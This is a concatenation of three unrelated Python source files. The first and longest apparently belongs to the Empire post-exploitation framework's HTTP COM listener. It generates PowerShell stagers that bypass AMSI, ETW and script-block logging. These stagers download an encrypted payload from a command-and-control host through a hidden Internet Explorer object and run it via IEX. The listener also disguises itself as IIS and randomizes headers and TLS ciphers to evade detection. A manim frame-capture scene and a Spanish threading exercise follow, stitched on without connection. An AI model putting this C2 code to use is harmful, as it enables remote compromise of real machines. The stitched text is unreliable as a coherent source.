# optional/specific for this module
self.app = None
self.uris = [a.strip('/') for a in self.options['DefaultProfile']['Value'].split('|')[0].split(',')]
# set the default staging key to the controller db default
self.options['StagingKey']['Value'] = str(helpers.get_config('staging_key')[0])
# used to protect self.http and self.mainMenu.conn during threaded listener access
self.lock = threading.Lock()
# randomize the length of the default_response and index_page headers to evade signature based scans
self.header_offset = random.randint(0, 64)
# this might not be necessary. Could probably be achieved by just callingg mainmenu.get_db but all the other files have
# implemented it in place. Might be worthwhile to just make a database handling file
def get_db_connection(self):
"""
Returns the cursor for SQLlite DB
"""
self.lock.acquire()
self.mainMenu.conn.row_factory = None
self.lock.release()
return self.mainMenu.conn
def default_response(self):
"""
Returns an IIS 7.5 404 not found page.
"""
return '\r\n'.join([
'<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">',
'<html xmlns="http://www.w3.org/1999/xhtml">',
'<head>',
'<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>',
'<title>404 - File or directory not found.</title>',
'<style type="text/css">',
'<!--',
'body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}',
'fieldset{padding:0 15px 10px 15px;}',
'h1{font-size:2.4em;margin:0;color:#FFF;}',
'h2{font-size:1.7em;margin:0;color:#CC0000;}',
'h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;}',
'#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;',
'background-color:#555555;}',
'#content{margin:0 0 0 2%;position:relative;}',
'.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}',
'-->',
'</style>',
'</head>',
'<body>',
'<div id="header"><h1>Server Error</h1></div>',
'<div id="content">',
' <div class="content-container"><fieldset>',
' <h2>404 - File or directory not found.</h2>',
' <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3>',
' </fieldset></div>',
'</div>',
'</body>',
'</html>',
' ' * self.header_offset, # randomize the length of the header to evade signature based detection
])
def method_not_allowed_page(self):
"""
Imitates IIS 7.5 405 "method not allowed" page.
"""
return '\r\n'.join([
'<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">',
'<html xmlns="http://www.w3.org/1999/xhtml">',
'<head>',
'<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>',
'<title>405 - HTTP verb used to access this page is not allowed.</title>',
'<style type="text/css">',
'<!--',
'body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}',
'fieldset{padding:0 15px 10px 15px;} ',
'h1{font-size:2.4em;margin:0;color:#FFF;}',
'h2{font-size:1.7em;margin:0;color:#CC0000;} ',
'h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} ',
'#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;',
'background-color:#555555;}',
'#content{margin:0 0 0 2%;position:relative;}',
'.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}',
'-->',
'</style>',
'</head>',
'<body>',
'<div id="header"><h1>Server Error</h1></div>',
'<div id="content">',
' <div class="content-container"><fieldset>',
' <h2>405 - HTTP verb used to access this page is not allowed.</h2>',
' <h3>The page you are looking for cannot be displayed because an invalid method (HTTP verb) was used to attempt access.</h3>',
' </fieldset></div>',
'</div>',
'</body>',
'</html>\r\n'
])
def index_page(self):
"""
Returns a default HTTP server page.
"""
return '\r\n'.join([
'<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">',
'<html xmlns="http://www.w3.org/1999/xhtml">',
'<head>',
'<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />',
'<title>IIS7</title>',
'<style type="text/css">',
'<!--',
'body {',
' color:#000000;',
' background-color:#B3B3B3;',
' margin:0;',
'}',
'',
'#container {',
' margin-left:auto;',
' margin-right:auto;',
' text-align:center;',
' }',
'',
'a img {',
' border:none;',
'}',
'',
'-->',
'</style>',
'</head>',
'<body>',
'<div id="container">',
'<a href="http://go.microsoft.com/fwlink/?linkid=66138&clcid=0x409"><img src="welcome.png" alt="IIS7" width="571" height="411" /></a>',
'</div>',
'</body>',
'</html>',
])
def validate_options(self):
"""
Validate all options for this listener.
"""
self.uris = [a.strip('/') for a in self.options['DefaultProfile']['Value'].split('|')[0].split(',')]
for key in self.options:
if self.options[key]['Required'] and (str(self.options[key]['Value']).strip() == ''):
print(helpers.color("[!] Option \"%s\" is required." % (key)))
return False
# If we've selected an HTTPS listener without specifying CertPath, let us know.
if self.options['Host']['Value'].startswith('https') and self.options['CertPath']['Value'] == '':
print(helpers.color("[!] HTTPS selected but no CertPath specified."))
return False
return True
def generate_launcher(self, encode=True, obfuscate=False, obfuscationCommand="", userAgent='default',
proxy='default', proxyCreds='default', stagerRetries='0', language=None, safeChecks='',
listenerName=None, scriptLogBypass=True, AMSIBypass=True, AMSIBypass2=False, ETWBypass=False):
"""
Generate a basic launcher for the specified listener.
"""
if not language:
print(helpers.color('[!] listeners/http_com generate_launcher(): no language specified!'))
if listenerName and (listenerName in self.threads) and (
listenerName in self.mainMenu.listeners.activeListeners):
# extract the set options for this instantiated listener
listenerOptions = self.mainMenu.listeners.activeListeners[listenerName]['options']
host = listenerOptions['Host']['Value']
launcher = listenerOptions['Launcher']['Value']
stagingKey = listenerOptions['StagingKey']['Value']
profile = listenerOptions['DefaultProfile']['Value']
requestHeader = listenerOptions['RequestHeader']['Value']
uris = [a for a in profile.split('|')[0].split(',')]
stage0 = random.choice(uris)
customHeaders = profile.split('|')[2:]
if language.startswith('po'):
# PowerShell
stager = '$ErrorActionPreference = \"SilentlyContinue\";'
if safeChecks.lower() == 'true':
stager = helpers.randomize_capitalization("If($PSVersionTable.PSVersion.Major -ge 3){")
# ScriptBlock Logging bypass
if scriptLogBypass:
stager += bypasses.scriptBlockLogBypass()
if ETWBypass:
stager += bypasses.ETWBypass()
# @mattifestation's AMSI bypass
if AMSIBypass:
stager += bypasses.AMSIBypass()
# rastamouse AMSI bypass
if AMSIBypass2:
stager += bypasses.AMSIBypass2()
stager += "};"
stager += helpers.randomize_capitalization("[System.Net.ServicePointManager]::Expect100Continue=0;")
# TODO: reimplement stager retries?
# check if we're using IPv6
listenerOptions = copy.deepcopy(listenerOptions)
bindIP = listenerOptions['BindIP']['Value']
port = listenerOptions['Port']['Value']
if ':' in bindIP:
if "http" in host:
if "https" in host:
host = 'https://' + '[' + str(bindIP) + ']' + ":" + str(port)
else:
host = 'http://' + '[' + str(bindIP) + ']' + ":" + str(port)
# code to turn the key string into a byte array
stager += helpers.randomize_capitalization(
"$" + helpers.generate_random_script_var_name("K") + "=[System.Text.Encoding]::ASCII.GetBytes(")
stager += "'%s');" % (stagingKey)
# this is the minimized RC4 stager code from rc4.ps1
stager += helpers.randomize_capitalization('$R={$D,$' + helpers.generate_random_script_var_name(
"K") + '=$Args;$S=0..255;0..255|%{$J=($J+$S[$_]+$' + helpers.generate_random_script_var_name(
"K") + '[$_%$' + helpers.generate_random_script_var_name(
"K") + '.Count])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-bxor$S[($S[$I]+$S[$H])%256]}};')
# prebuild the request routing packet for the launcher
routingPacket = packets.build_routing_packet(stagingKey, sessionID='00000000', language='POWERSHELL',
meta='STAGE0', additional='None', encData='')
b64RoutingPacket = base64.b64encode(routingPacket)
stager += "$ie=New-Object -COM InternetExplorer.Application;$ie.Silent=$True;$ie.visible=$False;$fl=14;"
stager += "$ser=" + helpers.obfuscate_call_home_address(host) + ";$t='" + stage0 + "';"
# add the RC4 packet to a header location
stager += "$c=\"%s: %s" % (requestHeader, b64RoutingPacket)
# Add custom headers if any
modifyHost = False
if customHeaders != []:
for header in customHeaders:
headerKey = header.split(':')[0]
headerValue = header.split(':')[1]
if headerKey.lower() == "host":
modifyHost = True
stager += "`r`n%s: %s" % (headerKey, headerValue)
stager += "\";"
# If host header defined, assume domain fronting is in use and add a call to the base URL first
# this is a trick to keep the true host name from showing in the TLS SNI portion of the client hello
if modifyHost:
stager += helpers.randomize_capitalization(
"$ie.navigate2($ser,$fl,0,$Null,$Null);while($ie.busy){Start-Sleep -Milliseconds 100};")
stager += "$ie.navigate2($ser+$t,$fl,0,$Null,$c);"
stager += "while($ie.busy){Start-Sleep -Milliseconds 100};"
stager += "$ht = $ie.document.GetType().InvokeMember('body', [System.Reflection.BindingFlags]::GetProperty, $Null, $ie.document, $Null).InnerHtml;"
stager += "try {$data=[System.Convert]::FromBase64String($ht)} catch {$Null}"
stager += helpers.randomize_capitalization("$iv=$data[0..3];$data=$data[4..$data.length];")
# decode everything and kick it over to IEX to kick off execution
stager += helpers.randomize_capitalization(
"-join[Char[]](& $R $data ($IV+$" + helpers.generate_random_script_var_name("K") + ")) | IEX")
if obfuscate:
stager = helpers.obfuscate(self.mainMenu.installPath, stager, obfuscationCommand=obfuscationCommand)
# base64 encode the stager and return it
if encode and ((not obfuscate) or ("launcher" not in obfuscationCommand.lower())):
return helpers.powershell_launcher(stager, launcher)
else:
# otherwise return the case-randomized stager
return stager
else:
print(helpers.color(
"[!] listeners/http_com generate_launcher(): invalid language specification: only 'powershell' is currently supported for this module."))
else:
print(helpers.color("[!] listeners/http_com generate_launcher(): invalid listener name specification!"))
def generate_stager(self, listenerOptions, encode=False, encrypt=True, obfuscate=False, obfuscationCommand="",
language=None):
"""
Generate the stager code needed for communications with this listener.
"""
if not language:
print(helpers.color('[!] listeners/http_com generate_stager(): no language specified!'))
return None
profile = listenerOptions['DefaultProfile']['Value']
uris = [a.strip('/') for a in profile.split('|')[0].split(',')]
stagingKey = listenerOptions['StagingKey']['Value']
host = listenerOptions['Host']['Value']
workingHours = listenerOptions['WorkingHours']['Value']
customHeaders = profile.split('|')[2:]
# select some random URIs for staging from the main profile
stage1 = random.choice(uris)
stage2 = random.choice(uris)
if language.lower() == 'powershell':
# read in the stager base
f = open("%s/data/agent/stagers/http_com.ps1" % (self.mainMenu.installPath))
stager = f.read()
f.close()
# Get the random function name generated at install and patch the stager with the proper function name
# Get the random function name generated at install and patch the stager with the proper function name
conn = self.get_db_connection()
self.lock.acquire()
stager = helpers.keyword_obfuscation(stager)
self.lock.release()
# make sure the server ends with "/"
if not host.endswith("/"):
host += "/"
# Patch in custom Headers
headers = ""
if customHeaders != []:
crlf = False
for header in customHeaders:
headerKey = header.split(':')[0]
headerValue = header.split(':')[1]
# Host header TLS SNI logic done within http_com.ps1
if crlf:
headers += "`r`n"
else:
crlf = True
headers += "%s: %s" % (headerKey, headerValue)
stager = stager.replace("$customHeaders = \"\";", "$customHeaders = \"" + headers + "\";")
# patch the server and key information
stager = stager.replace('REPLACE_SERVER', host)
stager = stager.replace('REPLACE_STAGING_KEY', stagingKey)
stager = stager.replace('index.jsp', stage1)
stager = stager.replace('index.php', stage2)
# patch in working hours, if any
if workingHours != "":
stager = stager.replace('WORKING_HOURS_REPLACE', workingHours)
randomizedStager = ''
stagingKey = stagingKey.encode('UTF-8')
for line in stager.split("\n"):
line = line.strip()
# skip commented line
if not line.startswith("#"):
# randomize capitalization of lines without quoted strings
if "\"" not in line:
randomizedStager += helpers.randomize_capitalization(line)
else:
randomizedStager += line
if obfuscate:
randomizedStager = helpers.obfuscate(self.mainMenu.installPath, randomizedStager,
obfuscationCommand=obfuscationCommand)
# base64 encode the stager and return it
if encode:
return helpers.enc_powershell(randomizedStager)
elif encrypt:
RC4IV = os.urandom(4)
return RC4IV + encryption.rc4(RC4IV + stagingKey, randomizedStager.encode('UTF-8'))
else:
# otherwise just return the case-randomized stager
return randomizedStager
else:
print(helpers.color(
"[!] listeners/http_com generate_stager(): invalid language specification, only 'powershell' is current supported for this module."))
def generate_agent(self, listenerOptions, language=None, obfuscate=False, obfuscationCommand=""):
"""
Generate the full agent code needed for communications with this listener.
"""
if not language:
print(helpers.color('[!] listeners/http_com generate_agent(): no language specified!'))
return None
language = language.lower()
delay = listenerOptions['DefaultDelay']['Value']
jitter = listenerOptions['DefaultJitter']['Value']
profile = listenerOptions['DefaultProfile']['Value']
lostLimit = listenerOptions['DefaultLostLimit']['Value']
killDate = listenerOptions['KillDate']['Value']
b64DefaultResponse = base64.b64encode(self.default_response().encode('UTF-8'))
if language == 'powershell':
f = open(self.mainMenu.installPath + "./data/agent/agent.ps1")
code = f.read()
f.close()
# Get the random function name generated at install and patch the stager with the proper function name
conn = self.get_db_connection()
self.lock.acquire()
code = helpers.keyword_obfuscation(code)
self.lock.release()
# patch in the comms methods
commsCode = self.generate_comms(listenerOptions=listenerOptions, language=language)
code = code.replace('REPLACE_COMMS', commsCode)
# strip out comments and blank lines
code = helpers.strip_powershell_comments(code)
# patch in the delay, jitter, lost limit, and comms profile
code = code.replace('$AgentDelay = 60', "$AgentDelay = " + str(delay))
code = code.replace('$AgentJitter = 0', "$AgentJitter = " + str(jitter))
code = code.replace(
'$Profile = "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"',
"$Profile = \"" + str(profile) + "\"")
code = code.replace('$LostLimit = 60', "$LostLimit = " + str(lostLimit))
# code = code.replace('$DefaultResponse = ""', '$DefaultResponse = "'+b64DefaultResponse+'"')
code = code.replace('$DefaultResponse = ""', '$DefaultResponse = "' + str(b64DefaultResponse) + '"')
# patch in the killDate and workingHours if they're specified
if killDate != "":
code = code.replace('$KillDate,', "$KillDate = '" + str(killDate) + "',")
if obfuscate:
code = helpers.obfuscate(self.mainMenu.installPath, code, obfuscationCommand=obfuscationCommand)
return code
else:
print(helpers.color(
"[!] listeners/http_com generate_agent(): invalid language specification, only 'powershell' is currently supported for this module."))
def generate_comms(self, listenerOptions, language=None):
"""
Generate just the agent communication code block needed for communications with this listener.
This is so agents can easily be dynamically updated for the new listener.
"""
if language:
if language.lower() == 'powershell':
updateServers = """
$Script:ControlServers = @("%s");
$Script:ServerIndex = 0;
if(-not $IE) {
$Script:IE=New-Object -COM InternetExplorer.Application;
$Script:IE.Silent = $True
$Script:IE.visible = $False
}
else {
$Script:IE = $IE
}
""" % (listenerOptions['Host']['Value'])
getTask = """
$script:GetTask = {
try {
if ($Script:ControlServers[$Script:ServerIndex].StartsWith("http")) {
# meta 'TASKING_REQUEST' : 4
$RoutingPacket = New-RoutingPacket -EncData $Null -Meta 4
$RoutingCookie = [Convert]::ToBase64String($RoutingPacket)
$Headers = "%s: $RoutingCookie"
$script:Headers.GetEnumerator()| %%{ $Headers += "`r`n$($_.Name): $($_.Value)" }
# choose a random valid URI for checkin
$taskURI = $script:TaskURIs | Get-Random
$ServerURI = $Script:ControlServers[$Script:ServerIndex] + $taskURI
$Script:IE.navigate2($ServerURI, 14, 0, $Null, $Headers)
while($Script:IE.busy -eq $true){Start-Sleep -Milliseconds 100}
$html = $Script:IE.document.GetType().InvokeMember('body', [System.Reflection.BindingFlags]::GetProperty, $Null, $Script:IE.document, $Null).InnerHtml
try {
[System.Convert]::FromBase64String($html)
}
catch {$Null}
}
}
catch {
$script:MissedCheckins += 1
if ($_.Exception.GetBaseException().Response.statuscode -eq 401) {
# restart key negotiation
Start-Negotiate -S "$ser" -SK $SK -UA $ua
}
}
}
""" % (listenerOptions['RequestHeader']['Value'])
sendMessage = """
$script:SendMessage = {
param($Packets)
if($Packets) {
# build and encrypt the response packet
$EncBytes = Encrypt-Bytes $Packets
# build the top level RC4 "routing packet"
# meta 'RESULT_POST' : 5
$RoutingPacket = New-RoutingPacket -EncData $EncBytes -Meta 5
$bytes=$e.GetBytes([System.Convert]::ToBase64String($RoutingPacket));
if($Script:ControlServers[$Script:ServerIndex].StartsWith('http')) {
$Headers = ""
$script:Headers.GetEnumerator()| %{ $Headers += "`r`n$($_.Name): $($_.Value)" }
$Headers.TrimStart("`r`n")
try {
# choose a random valid URI for checkin
$taskURI = $script:TaskURIs | Get-Random
$ServerURI = $Script:ControlServers[$Script:ServerIndex] + $taskURI
$Script:IE.navigate2($ServerURI, 14, 0, $bytes, $Headers)
while($Script:IE.busy -eq $true){Start-Sleep -Milliseconds 100}
}
catch [System.Net.WebException]{
# exception posting data...
if ($_.Exception.GetBaseException().Response.statuscode -eq 401) {
# restart key negotiation
Start-Negotiate -S "$ser" -SK $SK -UA $ua
}
}
}
}
}
"""
return updateServers + getTask + sendMessage
else:
print(helpers.color(
"[!] listeners/http_com generate_comms(): invalid language specification, only 'powershell' is currently supported for this module."))
else:
print(helpers.color('[!] listeners/http_com generate_comms(): no language specified!'))
def start_server(self, listenerOptions):
"""
Threaded function that actually starts up the Flask server.
"""
# make a copy of the currently set listener options for later stager/agent generation
listenerOptions = copy.deepcopy(listenerOptions)
# suppress the normal Flask output
log = logging.getLogger('werkzeug')
log.setLevel(logging.ERROR)
bindIP = listenerOptions['BindIP']['Value']
host = listenerOptions['Host']['Value']
port = listenerOptions['Port']['Value']
stagingKey = listenerOptions['StagingKey']['Value']
app = Flask(__name__)
self.app = app
# Set HTTP/1.1 as in IIS 7.5 instead of /1.0
WSGIRequestHandler.protocol_version = "HTTP/1.1"
@app.before_request
def check_ip():
"""
Before every request, check if the IP address is allowed.
"""
if not self.mainMenu.agents.is_ip_allowed(request.remote_addr):
listenerName = self.options['Name']['Value']
message = "[!] {} on the blacklist/not on the whitelist requested resource".format(request.remote_addr)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http_com/{}".format(listenerName))
return make_response(self.default_response(), 404)
@app.after_request
def change_header(response):
"Modify the headers response server."
headers = listenerOptions['Headers']['Value']
for key in headers.split("|"):
value = key.split(":")
response.headers[value[0]] = value[1]
return response
@app.after_request
def add_proxy_headers(response):
"Add HTTP headers to avoid proxy caching."
response.headers['Cache-Control'] = "no-cache, no-store, must-revalidate"
response.headers['Pragma'] = "no-cache"
response.headers['Expires'] = "0"
return response
@app.errorhandler(405)
def handle_405(e):
"""
Returns IIS 7.5 405 page for every Flask 405 error.
"""
return make_response(self.method_not_allowed_page(), 405)
@app.route('/')
@app.route('/iisstart.htm')
def serve_index():
"""
Return default server web page if user navigates to index.
"""
static_dir = self.mainMenu.installPath + "data/misc/"
return make_response(self.index_page(), 200)
@app.route('/<path:request_uri>', methods=['GET'])
def handle_get(request_uri):
"""
Handle an agent GET request.
This is used during the first step of the staging process,
and when the agent requests taskings.
"""
if request_uri.lower() == 'welcome.png':
# Serves image loaded by index page.
#
# Thanks to making it case-insensitive it works the same way as in
# an actual IIS server
static_dir = self.mainMenu.installPath + "data/misc/"
return send_from_directory(static_dir, 'welcome.png')
clientIP = request.remote_addr
listenerName = self.options['Name']['Value']
message = "[*] GET request for {}/{} from {}".format(request.host, request_uri, clientIP)
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/http_com/{}".format(listenerName))
routingPacket = None
reqHeader = request.headers.get(listenerOptions['RequestHeader']['Value'])
if reqHeader and reqHeader != '':
try:
if reqHeader.startswith("b'"):
tmp = repr(reqHeader)[2:-1].replace("'", "").encode("UTF-8")
else:
tmp = reqHeader.encode("UTF-8")
routingPacket = base64.b64decode(tmp)
except Exception as e:
routingPacket = None
# pass
# if isinstance(results, str):
if routingPacket:
# parse the routing packet and process the results
dataResults = self.mainMenu.agents.handle_agent_data(stagingKey, routingPacket, listenerOptions,
clientIP)
if dataResults and len(dataResults) > 0:
for (language, results) in dataResults:
if results:
if results == 'STAGE0':
# handle_agent_data() signals that the listener should return the stager.ps1 code
# step 2 of negotiation -> return stager.ps1 (stage 1)
listenerName = self.options['Name']['Value']
message = "\n[*] Sending {} stager (stage 1) to {}".format(language, clientIP)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http_com/{}".format(listenerName))
stage = self.generate_stager(language=language, listenerOptions=listenerOptions,
obfuscate=self.mainMenu.obfuscate,
obfuscationCommand=self.mainMenu.obfuscateCommand)
return make_response(base64.b64encode(stage), 200)
elif results.startswith(b'ERROR:'):
listenerName = self.options['Name']['Value']
message = "[!] Error from agents.handle_agent_data() for {} from {}: {}".format(
request_uri, clientIP, results)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http_com/{}".format(listenerName))
if 'not in cache' in results:
# signal the client to restage
print(helpers.color("[*] Orphaned agent from %s, signaling retaging" % (clientIP)))
return make_response(self.default_response(), 401)
else:
return make_response(self.default_response(), 404)
else:
# actual taskings
listenerName = self.options['Name']['Value']
message = "[*] Agent from {} retrieved taskings".format(clientIP)
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/http_com/{}".format(listenerName))
return make_response(base64.b64encode(results), 200)
else:
# dispatcher.send("[!] Results are None...", sender='listeners/http_com')
return make_response(self.default_response(), 404)
else:
return make_response(self.default_response(), 404)
else:
listenerName = self.options['Name']['Value']
message = "[!] {} requested by {} with no routing packet.".format(request_uri, clientIP)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http_com/{}".format(listenerName))
return make_response(self.default_response(), 404)
@app.route('/<path:request_uri>', methods=['POST'])
def handle_post(request_uri):
"""
Handle an agent POST request.
"""
stagingKey = listenerOptions['StagingKey']['Value']
clientIP = request.remote_addr
# the routing packet should be at the front of the binary request.data
# NOTE: this can also go into a cookie/etc.
try:
requestData = base64.b64decode(request.get_data())
except:
requestData = None
dataResults = self.mainMenu.agents.handle_agent_data(stagingKey, requestData, listenerOptions, clientIP)
if dataResults and len(dataResults) > 0:
for (language, results) in dataResults:
if isinstance(results, str):
results = results.encode('UTF-8')
if results:
if results.startswith(b'STAGE2'):
# TODO: document the exact results structure returned
sessionID = results.split(b' ')[1].strip().decode('UTF-8')
sessionKey = self.mainMenu.agents.agents[sessionID]['sessionKey']
listenerName = self.options['Name']['Value']
message = "[*] Sending agent (stage 2) to {} at {}".format(sessionID, clientIP)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http_com/{}".format(listenerName))
# step 6 of negotiation -> server sends patched agent.ps1/agent.py
agentCode = self.generate_agent(language=language, listenerOptions=listenerOptions,
obfuscate=self.mainMenu.obfuscate,
obfuscationCommand=self.mainMenu.obfuscateCommand)
encrypted_agent = encryption.aes_encrypt_then_hmac(sessionKey, agentCode)
# TODO: wrap ^ in a routing packet?
return make_response(base64.b64encode(encrypted_agent), 200)
elif results[:10].lower().startswith(b'error') or results[:10].lower().startswith(b'exception'):
listenerName = self.options['Name']['Value']
message = "[!] Error returned for results by {} : {}".format(clientIP, results)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http_com/{}".format(listenerName))
return make_response(self.default_response(), 200)
elif results == b'VALID':
listenerName = self.options['Name']['Value']
message = "[*] Valid results return by {}".format(clientIP)
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/http_com/{}".format(listenerName))
return make_response(self.default_response(), 200)
else:
return make_response(base64.b64encode(results), 200)
else:
return make_response(self.default_response(), 404)
else:
return make_response(self.default_response(), 404)
try:
certPath = listenerOptions['CertPath']['Value']
host = listenerOptions['Host']['Value']
if certPath.strip() != '' and host.startswith('https'):
certPath = os.path.abspath(certPath)
# support any version of tls
pyversion = sys.version_info
if pyversion[0] == 2 and pyversion[1] == 7 and pyversion[2] >= 13:
proto = ssl.PROTOCOL_TLS
elif pyversion[0] >= 3:
proto = ssl.PROTOCOL_TLS
else:
proto = ssl.PROTOCOL_SSLv23
context = ssl.SSLContext(proto)
context.load_cert_chain("%s/empire-chain.pem" % (certPath), "%s/empire-priv.key" % (certPath))
# setting the cipher list allows for modification of the JA3 signature. Select a random cipher to change
# it every time the listener is launched
cipherlist = ["ECDHE-RSA-AES256-GCM-SHA384", "ECDHE-RSA-AES128-GCM-SHA256", "ECDHE-RSA-AES256-SHA384",
"ECDHE-RSA-AES256-SHA", "AES256-SHA256", "AES128-SHA256"]
selectciph = random.choice(cipherlist)
context.set_ciphers(selectciph)
app.run(host=bindIP, port=int(port), threaded=True, ssl_context=context)
else:
app.run(host=bindIP, port=int(port), threaded=True)
except Exception as e:
listenerName = self.options['Name']['Value']
message = "[!] Listener startup on port {} failed: {}".format(port, e)
message += "\n[!] Ensure the folder specified in CertPath exists and contains your pem and private key file."
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http_com/{}".format(listenerName))
def start(self, name=''):
"""
Start a threaded instance of self.start_server() and store it in the
self.threads dictionary keyed by the listener name.
"""
listenerOptions = self.options
if name and name != '':
self.threads[name] = helpers.KThread(target=self.start_server, args=(listenerOptions,))
self.threads[name].start()
time.sleep(1)
# returns True if the listener successfully started, false otherwise
return self.threads[name].is_alive()
else:
name = listenerOptions['Name']['Value']
self.threads[name] = helpers.KThread(target=self.start_server, args=(listenerOptions,))
self.threads[name].start()
time.sleep(1)
# returns True if the listener successfully started, false otherwise
return self.threads[name].is_alive()
def shutdown(self, name=''):
"""
Terminates the server thread stored in the self.threads dictionary,
keyed by the listener name.
"""
if name and name != '':
print(helpers.color("[!] Killing listener '%s'" % (name)))
self.threads[name].kill()
else:
print(helpers.color("[!] Killing listener '%s'" % (self.options['Name']['Value'])))
self.threads[self.options['Name']['Value']].kill()
|
raw_frame_scene.py
|
# from @RY-Givenchy
#
# Copyright: 2020 niedong
# Raw frame operation scene for manim
#
from manimlib.scene.scene import Scene
from manimlib.constants import *
import threading
import time
class RawFrameScene(Scene):
CONFIG = {
"num_frames": 0,
"msg_flag": True
}
def write_frame(self, frame):
self.file_writer.write_frame(frame)
self.num_frames += 1
def write_current_frame(self):
self.write_frame(self.get_frame())
def capture(self, mobjects, write_current_frame=True):
"""
Capture mobjects on the current frame, write to movie if possible.
:param mobjects: instance of Mobject to be captured.
:param write_current_frame: boolean value, whether to write current frame to movie.
"""
self.update_frame(mobjects, self.get_frame())
if write_current_frame:
self.write_current_frame()
return self
def print_frame_message(self, msg_end="\r"):
sec = int(self.num_frames / self.camera.frame_rate)
print("Capturing raw frame: {}. Video duration: {} min {:2d} sec".format(
self.num_frames, sec // 60, sec % 60), end=msg_end)
def setup_thread(self):
def thread_func():
while self.msg_flag:
self.print_frame_message()
time.sleep(1)
thread = threading.Thread(target=thread_func, daemon=True)
setattr(self, "msg_thread", thread)
# Normally, 'self.setup' method is called automatically before 'self.construct'.
# However, if 'self.setup' method is override, call 'super().setup' manually.
def setup(self):
"""
Setup method for RawFrameScene. A must call before using this scene.
"""
self.file_writer.open_movie_pipe()
self.setup_thread()
self.msg_thread.start()
# Normally, 'self.tear_down' method is called automatically after 'self.construct'.
# However, if 'self.tear_down' method is override, call 'super().tear_down' manually.
def tear_down(self):
"""
Finish method for RawFrameScene. A must call after using this scene.
"""
self.file_writer.close_movie_pipe()
setattr(self, "msg_flag", False)
self.msg_thread.join()
self.print_frame_message(msg_end="\n")
self.num_plays += 1
def play(self, *args, **kwargs):
"""
'self.play' method fails in this scene. Do not use it.
"""
raise Exception("""
'self.play' method is not allowed to use in this scene
Use 'self.capture(...)' instead
""")
def wait(self, duration=DEFAULT_WAIT_TIME, stop_condition=None):
for i in range(int(duration * self.camera.frame_rate)):
self.write_current_frame()
def clear(self):
self.reset_camera()
|
gatos.py
|
"""
Problema: Gatos y ratones
Realizado en python
"""
import threading
import time
import random
mutex = threading.Semaphore(1)
mutex2 = threading.Semaphore(1)
hay_platos = threading.Semaphore(0)
Platos = []
animales = []
comiendo = 0
MaxEat = 1
EComiendo = threading.Semaphore(0)
acabado = 0
class plato:
def __init__(self):
self.plato = random.random()
print ("Sirviendo comida al plato %1.3f" % self.plato)
time.sleep(self.plato*1/3)
def comido(self):
numero=self.plato
time.sleep(self.plato*2/3)
return(numero)
class cats:
def __init__(self):
self.cats = random.random()
print ("llego el gato numero %1.3f" % self.cats)
time.sleep(self.cats)
def numero(self):
numero=self.cats
return(numero)
class ratones:
def __init__(self):
self.ratones = random.random()
print ("salio el raton numero %1.3f" % self.ratones)
time.sleep(self.ratones)
def numero(self):
numero=self.ratones
return(numero)
def pongo_plato():
global comiendo
global MaxEat
global acabado
while True:
numero = plato().comido()
evento = plato()
mutex2.acquire()
if comiendo < 0:
comiendo=0
if comiendo == MaxEat:
mutex2.release()
if(acabado != 0):
print ("Alguien comio el plato (%1.3f)" % acabado)
EComiendo.acquire()
else:
mutex2.release()
print ("Puede alguien comerse el plato (%1.3f)" % numero)
comiendo += 1
mutex.acquire()
Platos.append(evento)
if (len(animales) != 0):
anim=animales.pop()
mutex.release()
hay_platos.release()
def gato():
global comiendo
global MaxEat
global acabado
while True:
numero = plato().comido()
evento=cats()
animal_n = cats().numero()
hay_platos.acquire()
mutex2.acquire()
if comiendo == MaxEat:
print ("\tEl gato(%1.3f) tiene mucha hambre, y comera del plato (%1.3f)"%(animal_n, numero))
acabado = numero
EComiendo.release()
mutex2.release()
mutex.acquire()
comiendo -= 1
animales.append(evento)
plat = Platos.pop()
mutex.release()
def raton():
global comiendo
global MaxEat
global acabado
while True:
numero = plato().comido()
evento= ratones()
animal_n=ratones().numero()
hay_platos.acquire()
mutex2.acquire()
if comiendo == MaxEat:
print ("\t\tEl raton (%1.3f) voy a comer (%1.3f)" % (animal_n, numero))
acabado = numero
EComiendo.release()
mutex2.release()
mutex.acquire()
comiendo -= 1
animales.append(evento)
plat = Platos.pop()
mutex.release()
#inicio de hilos
